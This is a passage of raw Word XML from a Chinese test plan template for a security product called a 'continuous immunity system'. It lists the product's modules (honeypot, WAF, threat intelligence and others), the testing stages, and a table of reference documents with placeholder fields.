    <w:p w14:paraId="7344C024" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00D56FCB" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="342" w:firstLine="684"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>持续免疫系统是一套完整的系统安全防护体系，主要包括：登录/注册模块，首页展示模块 ，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>中心模块，可信防护模块，用户行为分析模块，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>主动对抗模块，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>区块链</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>防篡改</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>模块，蜜罐模块，系统检测模块，WAF防火墙模块，攻防势态模块，威胁情报模块，插件管理模块，FAQ问答模块等功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8C1D44" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc227386329"/>
      <w:bookmarkStart w:id="131" w:name="_Toc227386472"/>
      <w:bookmarkStart w:id="132" w:name="_Toc222309947"/>
      <w:bookmarkStart w:id="133" w:name="_Toc36487883"/>
      <w:bookmarkStart w:id="134" w:name="_Toc36573210"/>
      <w:bookmarkStart w:id="135" w:name="_Toc36630287"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试工作内容和范围</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
      <w:bookmarkEnd w:id="131"/>
      <w:bookmarkEnd w:id="132"/>
      <w:bookmarkEnd w:id="133"/>
      <w:bookmarkEnd w:id="134"/>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w14:paraId="2D4B7AAB" w14:textId="1AD5AB97" w:rsidR="00C55A9C" w:rsidRPr="00D56FCB" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="342" w:firstLine="684"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>测试所需的阶段</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>：用例</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>评审、测试设计、冒烟测试、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>测试、回归测试、自动化测试、性能测试、交叉自由测试等</w:t>
      </w:r>
      <w:r w:rsidR="00F44F83">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ADB81B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc227386473"/>
      <w:bookmarkStart w:id="137" w:name="_Toc227386330"/>
      <w:bookmarkStart w:id="138" w:name="_Toc222309948"/>
      <w:bookmarkStart w:id="139" w:name="_Toc36487884"/>
      <w:bookmarkStart w:id="140" w:name="_Toc36573211"/>
      <w:bookmarkStart w:id="141" w:name="ceshi"/>
      <w:bookmarkStart w:id="142" w:name="_Toc36630288"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>测试文档</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
      <w:bookmarkEnd w:id="137"/>
      <w:bookmarkEnd w:id="138"/>
      <w:bookmarkEnd w:id="139"/>
      <w:bookmarkEnd w:id="140"/>
      <w:bookmarkEnd w:id="142"/>
    </w:p>
    <w:p w14:paraId="7A7CB04F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="143" w:name="_Toc227386474"/>
      <w:bookmarkStart w:id="144" w:name="_Toc222309949"/>
      <w:bookmarkStart w:id="145" w:name="_Toc227386331"/>
      <w:bookmarkStart w:id="146" w:name="_Toc36487885"/>
      <w:bookmarkStart w:id="147" w:name="_Toc36573212"/>
      <w:bookmarkStart w:id="148" w:name="_Toc36630289"/>
      <w:bookmarkEnd w:id="141"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试所需参考文档</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
      <w:bookmarkEnd w:id="144"/>
      <w:bookmarkEnd w:id="145"/>
      <w:bookmarkEnd w:id="146"/>
      <w:bookmarkEnd w:id="147"/>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w14:paraId="1C84B200" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00D56FCB" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="342" w:firstLine="684"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>下表列出了制定和实施该测试方案时所需要使用的相关文档，并标明了各文档的可用性：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AD61AC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210" w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[注：列表中为文档项，需要具化，可适当地删除或添加文档项。]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564"/>
        <w:gridCol w:w="1478"/>
        <w:gridCol w:w="1272"/>
        <w:gridCol w:w="1419"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="51ECA203" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
          </w:tcPr>
          <w:p w14:paraId="7B88DBBF"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文档</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>[具体的文档名称和列表（版本/日期）]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
          </w:tcPr>
          <w:p w14:paraId="4C632D8A"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已创建或可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
          </w:tcPr>
          <w:p w14:paraId="13D6EA6A"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已被接收或已经过复审</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
          </w:tcPr>
          <w:p w14:paraId="36EBB1D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作者或来源</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>[角色和姓名]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
          </w:tcPr>
          <w:p w14:paraId="0B12239B"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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="703FAA28" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E102979"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软件产品背景相关资料</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>[业务简介、名词解释、操作说明、系统资料、访问环境等]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D1405BC"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142CE407"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　否□</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19349525"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PM/RD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="114A738D"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29D241C7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="556FBABD"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软件产品调研相关资料</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>[前期调研资料等]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A5BC864"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6E237519"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　否□</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="615038F1"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PM/RD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DA54EF0"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3E155B60" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02323B0D"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MRD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C10075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6DF64F20"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1D466A2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PM/RD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31630075"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1CFF547A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="545F47AB"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概要设计</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="664D4422"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3D3BC47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38ECC33A"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RD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E0A522C"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4B17BAF7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A5894C8"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详细设计</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03506293"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3DE2516F"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2E5AD35D"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RD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D6B5E90"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0A2642F9" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="686C6AEC"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产品性能要求</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="224ECDBB"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44374B49"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18500CE2"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PM/RD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="520AFA04"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24E91830" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78E403ED"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产品常规检查checklist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E77812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29A277EE"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58DFB93B"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PM/RD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19D1E91F"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3B8B564D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D51BFAF"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产品升级检查checklist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="643352AC"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1FF76FDF"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728B7A40"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PM/RD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BDDEAF3"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237C45DA" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B7AA2B5"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运</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>维部署</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>文档</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AC0F8AE"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3811200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040666D7"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RD/OP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04A405B9"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036CAF95" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71908626"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上线步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5077445C"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0A864E4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5D758688"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RD/OP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00B6E49B"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35AECE29" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B988D1E"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单元测试设计</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="266AA0C2"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63A5F96F"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715EF1AF"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RD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="626AC906"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6974E893" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E27D2B7"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代码行diff分析</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28CB657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1E003570"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090ECDCD"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RD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17F9E939"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0A1472F6" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="450B4A6F"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产品总测试方案（性能）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D3367E7"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1825F21F"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02C643A4"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0B1D9CC9"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2A1BD8AC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D8B0AB8"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产品测试框架</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A270ABD"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76D3DC0F"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38AE1EC4"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0ADF0DAA"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4963D20A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="095414E1"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产品test case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79B1BFC5"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3316E613"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108523F9"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5EC1BC5B"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392E198D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="90"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="157DA174"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相关流程文档和模板</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FA78E20"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2A0410D5"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79067F7C"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QA/PM/RD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0955BC86"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28518B46" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38970AE4"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相关工作指南和规范（checklist）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1589B069"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5E416EFB"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0F4B6DED"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5BC4CF4C"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5277DE6C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B58CF26"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测试工具参考文档</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="790FD305"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6F1F6E6F"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23DC8FD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5F86D3CA"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3D5F25B4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2628" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B9CC09B"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测试陷阱tips、经验总结文档、case study文档、项目成长记录等参考资料</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2795DF50"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3BA4D435"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3D6DCE6B"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3894BE8E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0636353F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68A576F8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_Toc222309950"/>
      <w:bookmarkStart w:id="150" w:name="_Toc227386332"/>
      <w:bookmarkStart w:id="151" w:name="_Toc227386475"/>
      <w:bookmarkStart w:id="152" w:name="_Toc36487886"/>
      <w:bookmarkStart w:id="153" w:name="_Toc36573213"/>
      <w:bookmarkStart w:id="154" w:name="_Toc36630290"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试需提交文档</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
      <w:bookmarkEnd w:id="150"/>
      <w:bookmarkEnd w:id="151"/>
      <w:bookmarkEnd w:id="152"/>
      <w:bookmarkEnd w:id="153"/>
      <w:bookmarkEnd w:id="154"/>
    </w:p>
    <w:p w14:paraId="2ED1F411" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00D56FCB" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="342" w:firstLine="684"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
